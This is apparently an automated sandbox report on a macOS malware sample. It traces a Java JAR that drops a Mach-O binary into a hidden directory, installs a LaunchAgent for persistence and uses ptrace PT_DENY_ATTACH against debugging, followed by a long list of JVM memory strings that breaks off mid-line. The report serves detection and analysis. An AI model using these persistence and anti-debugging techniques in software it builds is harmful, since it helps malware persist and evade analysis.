          Java spawns dropped Mach-O filesShow sources
          Source: PID: 556Dropped Mach-O executed via jspawnhelper: /Users/berri/kIbwf02lJump to behavior

          Persistence and Installation Behavior:

          barindex
          Executes hidden filesShow sources
          Source: /bin/sh (PID: 557)File in hidden directory executed: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXHJump to behavior
          Writes Mach-O files to hidden directoriesShow sources
          Source: /Users/berri/kIbwf02l (PID: 556)64-bit Mach-O written to hidden directory: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXHJump to dropped file
          Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)Permissions modified for written 64-bit Mach-O /Users/berri/kIbwf02l: bits: - usr: - grp: - all: rwxJump to dropped file
          Source: /Users/berri/kIbwf02l (PID: 556)Bundle Info.plist File created: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/Info.plistJump to behavior
          Source: /Users/berri/kIbwf02l (PID: 556)Hidden Directory created: /Users/berri/.gLUpQD8hXDj8 -> /Users/berri/.gLUpQD8hXDj8Jump to behavior
          Source: /Users/berri/kIbwf02l (PID: 556)Shell command executed: sh -c /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXHJump to behavior
          Source: /System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher (PID: 554)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
          Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
          Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)File written: /Users/berri/kIbwf02lJump to dropped file
          Source: /Users/berri/kIbwf02l (PID: 556)File written: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXHJump to dropped file
          Source: /Applications/Preview.app/Contents/MacOS/Preview (PID: 558)Random device file read: /dev/randomJump to behavior
          Source: /System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher (PID: 554)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
          Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
          Source: /Applications/Preview.app/Contents/MacOS/Preview (PID: 558)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
          Source: /System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher (PID: 555)Java binary: /usr/bin/javaJump to behavior
          Source: /usr/bin/java (PID: 555)Java binary: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/javaJump to behavior
          Source: /Users/berri/kIbwf02l (PID: 556)XML plist file created: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/Info.plistJump to dropped file
          Source: /Users/berri/kIbwf02l (PID: 556)XML plist file created: /Users/berri/Library/LaunchAgents/com.gLUpQD8hXDj8.NBNlRBXH.plistJump to dropped file
          Source: /Users/berri/kIbwf02l (PID: 556)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/berri/Library/LaunchAgents/com.gLUpQD8hXDj8.NBNlRBXH.plistJump to behavior
          Source: /Users/berri/kIbwf02l (PID: 556)Launch agent created File created: /Users/berri/Library/LaunchAgents/com.gLUpQD8hXDj8.NBNlRBXH.plistJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Denies being traced/debugged (via ptrace PT_DENY_ATTACH)Show sources
          Source: /Users/berri/kIbwf02l (PID: 556)PTRACE system call (PT_DENY_ATTACH): PID 556 denies future tracesJump to behavior
          Source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH (PID: 557)PTRACE system call (PT_DENY_ATTACH): PID 557 denies future tracesJump to behavior
          Source: kIbwf02l.246.drDropped file: section __text with 7.1309 entropy (max. 8.0)
          Source: NBNlRBXH.248.drDropped file: section __text with 7.1309 entropy (max. 8.0)
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN8JVMCIEnv18get_klass_by_indexERK18constantPoolHandleiRbP5Klass
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: Unable to link/verify VirtualMachineError class
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/jvmci/jvmciCompilerToVM.cpp
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN29HotSpotJVMCIMetaAccessContext15set_allContextsEP15objArrayOopDesc
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::new_array
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: (JVMCI)
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCINMethodSizeLimit
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN5ciEnv36_HotSpotJVMCIMetaAccessContext_klassE
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_test_deoptimize_call_int
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime18identity_hash_codeEP10JavaThreadP7oopDesc
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/jvmci/jvmciCompiler.hpp
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_dynamic_new_array
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_new_array
          Source: java, 00000555.00000246.9.00000001025db000.00000001025e3000.rw-.sdmpBinary or memory string: 7sun.property.sun.boot.library.path/Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/lib(
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: INCLUDE_JVMCI
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: _jvmciHotSpotVMIntConstants
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN13JVMCICompiler14compile_methodEP5ciEnvP8ciMethodiP12DirectiveSet
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime30initialize_HotSpotJVMCIRuntimeEP6Thread
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::validate_object
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::throw_klass_external_name_exception
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN29HotSpotJVMCIMetaAccessContext17set_metadataRootsEP8_jobjectP15objArrayOopDesc
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: _jvmciHotSpotVMStructs
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime16initialize_JVMCIEP6Thread
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: jdk/vm/ci/runtime/JVMCI
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime11monitorexitEP10JavaThreadP7oopDescP9BasicLock
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_exception_handler_for_pc
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::log_object
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN13JVMCICompiler9_instanceE
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: _JVMCICounterSize
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __Z24set_jvmci_specific_flagsv
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN16JVMCIKlassHandleC2EP6ThreadP5Klass
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIEnv::dependencies_invalid
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN22HotSpotCompiledNmethod8jvmciEnvEP8_jobject
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::dynamic_new_instance
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_validate_object
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN14JVMCIVMStructs19localHotSpotVMTypesE
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: __ CodeHeapStateAnalytics: Function %s is not supported__ CodeHeapStateAnalytics lock wait took %10.3f seconds ___________ CodeCache lock wait took %10.3f seconds ___________ CodeCache lock hold took %10.3f seconds ___________ CodeHeapStateAnalytics total duration %10.3f seconds _________Compilation events%4d COMPILE PROFILING SKIPPED: %snmethod %d%s 0x%016lx code [0x%016lx, 0x%016lx]retry at different tier%4d COMPILE SKIPPED: %sklass id='%d' unloaded='1' flags='%d'method id='%d' holder='%d' return='%d' arguments='' bytes='%d' iicount='%d'type id='%d' name='%s'unknown id='%d'/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/compiler/compileLog.cppsymbol id='%d' name='<compilation_log thread='%lu'><fragment><![CDATA[]]><![CDATA[]]></fragment></compilation_log>inline_success reason='inline_fail reason='</>code_cache/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/compiler/compileTask.cppguarantee(_code_handle != NULL) failed%c%c%c%c%c - (method) @ %d (native) compile_id='%d' compile_kind='osr' osr_bci='%d' level='%d' blocking='1'task_queued comment='%s' hot_count='%d'taskunknownfailure reason='%s'task_done success='%d' nmsize='%d' count='%d' backedge_count='%d' inlined_bytes='%d' %c%c%c @ %d (not loaded)CompileTaskLockno_reasonbackedge_counttieredCTWreplaywhiteboxmust_be_compiled/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/code/compiledIC.cpp - metadata: - klass: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/oops/compiledICHolder.cppguarantee(holder_metadata()->is_method() || holder_metadata()->is_klass()) failedshould be method or klassguarantee(holder_klass()->is_klass()) failedshould be klass{compiledICHolder}/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/cpu/x86/compiledIC_aot_x86_64.cppguarantee(stub != NULL) failedstub not foundCompiledPltStaticCall/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/o
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN8JVMCIEnv15register_methodERK12methodHandleRP7nmethodiP11CodeOffsetsiP10CodeBufferiP9OopMapSetP21ExceptionHandlerTableP16AbstractCompilerP24DebugInformationRecorderP12DependenciesPS_ibb6HandleSL_SL_
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIHostThreads
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN10JavaThread26_jvmci_old_thread_countersE
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::none
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCITrace-1:
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime8shutdownEP6Thread
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN13JVMCICompiler9bootstrapEP6Thread
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime24load_and_clear_exceptionEP10JavaThread
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN7nmethod26clear_jvmci_installed_codeEv
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime24test_deoptimize_call_intEP10JavaThreadi
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime10log_printfEP10JavaThreadPKclll
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::new_instance
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN22HotSpotCompiledNmethod16_jvmciEnv_offsetE
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: guarantee(!_HotSpotJVMCIRuntime_initialized) failed
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN14JVMCIVMStructs21localHotSpotVMStructsE
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime13log_primitiveEP10JavaThreadtlh
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime23adjust_comp_level_innerERK12methodHandleb9CompLevelP10JavaThread
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN19HotSpotJVMCIRuntime26compilationLevelAdjustmentE6Handle
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: _jvmciHotSpotVMAddresses
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIUseFastLocking
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime23get_HotSpotJVMCIRuntimeEP6Thread
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: cannot reinitialize HotSpotJVMCIRuntime
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __GLOBAL__sub_I_jvmciCodeInstaller.cpp
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: EagerJVMCI
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIGlobals24check_jvmci_supported_gcEv
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN8JVMCIEnv23get_field_by_index_implEP13InstanceKlassR15fieldDescriptori
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN19HotSpotJVMCIRuntime34_compilationLevelAdjustment_offsetE
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::write_barrier_pre
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN13CodeInstaller13map_jvmci_bciEi
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIEnv::dependencies_failed
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN16JVMCIKlassHandleC1EP6ThreadP5Klass
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN5ciEnv12_JVMCI_klassE
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN8JVMCIEnv45get_instance_klass_for_declared_method_holderEP5Klass
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCICountersExcludeCompiler
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::test_deoptimize_call_int
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime12monitorenterEP10JavaThreadP7oopDescP9BasicLock
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN22HotSpotCompiledNmethod12set_jvmciEnvEP8_jobjectl
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN13JVMCICompiler15supports_nativeEv
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_new_multi_array
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN13JVMCICompiler4nameEv
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::throw_and_post_jvmti_exception
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCI Compiler does not support selected GC
          Source: java, 00000555.00000246.9.00000001025db000.00000001025e3000.rw-.sdmpBinary or memory string: ,java.property.java.home/Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home
          Source: java, 00000555.00000246.9.00000001025db000.00000001025e3000.rw-.sdmpBinary or memory string: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/lib
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCI
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: forcing TieredStopAtLevel to full optimization because JVMCI is enabled
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime10log_objectEP10JavaThreadP7oopDescbb
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_log_printf
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime29_HotSpotJVMCIRuntime_instanceE
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: _JVMCIPrintProperties
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN13JVMCICompiler12supports_osrEv
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime10vm_messageEhllll
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_thread_is_interrupted
          Source: java, 00000555.00000246.9.00000001025db000.00000001025e3000.rw-.sdmpBinary or memory string: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCICounterSize
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime20dynamic_new_instanceEP10JavaThreadP7oopDesc
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_write_barrier_post
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12CompilerToVM14get_jvmci_typeER16JVMCIKlassHandleP6Thread
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_monitorenter
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: guarantee(can_initialize_JVMCI()) failed
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_identity_hash_code
          Source: java, 00000555.00000246.1.0000000102a0000